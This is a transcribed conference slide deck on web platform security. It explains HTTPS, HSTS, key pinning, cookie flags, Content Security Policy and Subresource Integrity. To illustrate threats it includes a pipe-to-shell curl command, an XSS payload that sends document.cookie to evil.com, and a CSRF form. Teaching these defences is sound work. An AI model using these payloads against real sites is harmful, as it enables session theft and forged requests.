Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Platform Security
Search
Jérémy Courtial
October 26, 2016
Programming
0
47
Web Platform Security
Jérémy Courtial
October 26, 2016
Tweet
Share
More Decks by Jérémy Courtial
See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
25
An introduction to AppSec?
mrartichaut
0
43
Secure by design: introduction to threat modeling
mrartichaut
0
51
Taming secrets with Vault
mrartichaut
0
83
Lead Tech: Empowering the team
mrartichaut
0
47
go doSomeThing()
mrartichaut
0
52
Practical Cryptography : Data Encryption
mrartichaut
0
61
Practical Cryptography : Password Hashing
mrartichaut
1
73
HTTP/2 : One connection to rule them all
mrartichaut
1
60
Other Decks in Programming
See All in Programming
チームで開発し事業を加速するための"良い"設計の考え方 @ サポーターズCoLab 2025-07-08
agatan
1
470
dbt民主化とLLMによる開発ブースト ~ AI Readyな分析サイクルを目指して ~
yoshyum
3
1.1k
イベントストーミング図からコードへの変換手順 / Procedure for Converting Event Storming Diagrams to Code
nrslib
2
1.1k
ソフトウェア品質を数字で捉える技術。事業成長を支えるシステム品質の マネジメント
takuya542
2
15k
ニーリーにおけるプロダクトエンジニア
nealle
0
950
なぜ「共通化」を考え、失敗を繰り返すのか
rinchoku
1
680
“いい感じ“な定量評価を求めて - Four Keysとアウトカムの間の探求 -
nealle
2
12k
猫と暮らす Google Nest Cam生活🐈 / WebRTC with Google Nest Cam
yutailang0119
0
170
状態遷移図を書こう / Sequence Chart vs State Diagram
orgachem
PRO
2
200
The Modern View Layer Rails Deserves: A Vision For 2025 And Beyond @ RailsConf 2025, Philadelphia, PA
marcoroth
2
730
マッチングアプリにおけるフリックUIで苦労したこと
yuheiito
0
190
Azure AI Foundryではじめてのマルチエージェントワークフロー
seosoft
0
200
Featured
See All Featured
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
31
2.4k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
34
3.1k
Building a Scalable Design System with Sketch
lauravandoore
462
33k
Unsuck your backbone
ammeep
671
58k
Building an army of robots
kneath
306
45k
What's in a price? How to price your products and services
michaelherold
246
12k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
181
54k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
44
2.4k
What’s in a name? Adding method to the madness
productmarketing
PRO
23
3.5k
A Modern Web Designer's Workflow
chriscoyier
695
190k
Optimizing for Happiness
mojombo
379
70k
Balancing Empowerment & Direction
lara
1
450
Transcript
Web Platform Security Leveling up Jérémy Courtial Software Security Architect
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin.
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Rootkit ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Malware ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Trojan ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Browser /ˈbraʊ.zɚ/
http://yolo.com Go!
curl -s http://yolo.com | sh VS http://yolo.com Go!
Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from unknown origin.
Unknown origin
Unknown origin Unsecure
What is anyway ? www.google.com
What is anyway ? www.oodrive.com
What is anyway ? www.lol-cats.com
What is anyway ? 172.217.20.46
Unsecure origin
Unsecure origin
Transport Layer Security
Confidentiality Integrity Authentication
Other incentives "The green lock™"
Other incentives HTTP/2
Other incentives "Secure origins only" features
http https
GET /
GET / 302 Found Location: https://yolo.com
GET / 302 Found Location: https://yolo.com
None
None
302 Found
302 Found
302 Found
HTTP Strict Transport Security
Strict-Transport-Security :
max-age=31536000; Strict-Transport-Security :
includeSubdomains; max-age=31536000; Strict-Transport-Security :
http://yolo.com
http://yolo.com 307 Internal Redirect
https://yolo.com 307 Internal Redirect
307 Internal Redirect GET / https://yolo.com
Trust failure
TLS certificates are based on trust
Oh… trust … That's cute …
Trust-based systems don't have a good reliability record …
Certificate Authority failures Bad captive portal Every "Internal CA"
You've failed me for the last time
HTTP Certificate Pinning
Public-Key-Pins:
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.
Unknown code
XSS <h1>Hello, ${username}</h1>
XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"
XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>
CSRF https://evil.com Click here!
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
Everybody love cookies !
Rename Cookie to Spinach ?
Rename Cookie to Spinach ? Brussel Sprout ?
REJECTED
Locking the cookie jar
Set-Cookie : JSESSIONID=12345;
Set-Cookie : JSESSIONID=12345; secure;
Set-Cookie : JSESSIONID=12345; secure; HttpOnly;
Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;
Content Security Policy
Content-Security-Policy
: default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src
… ; connect-src …; Content-Security-Policy
: … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy
Our data (cookies, assets) are locked. What about third parties
?
HTML JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
Subresource Integrity
<script src="https://example.com/framework.js" > </script>
<script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser unknown code
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser trusted code
Many more Suborigins iframe sandboxing Credentials Management
https://www.w3.org/2011/webappsec/ @mikewest
Times have changed
Times have changed "secured" is the new default secured
What does secured means ? secured Least Privilege Authentication Integrity
Is our platform ? secured
Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,
unlimicon (The Noun Project) and design.google.com/icons/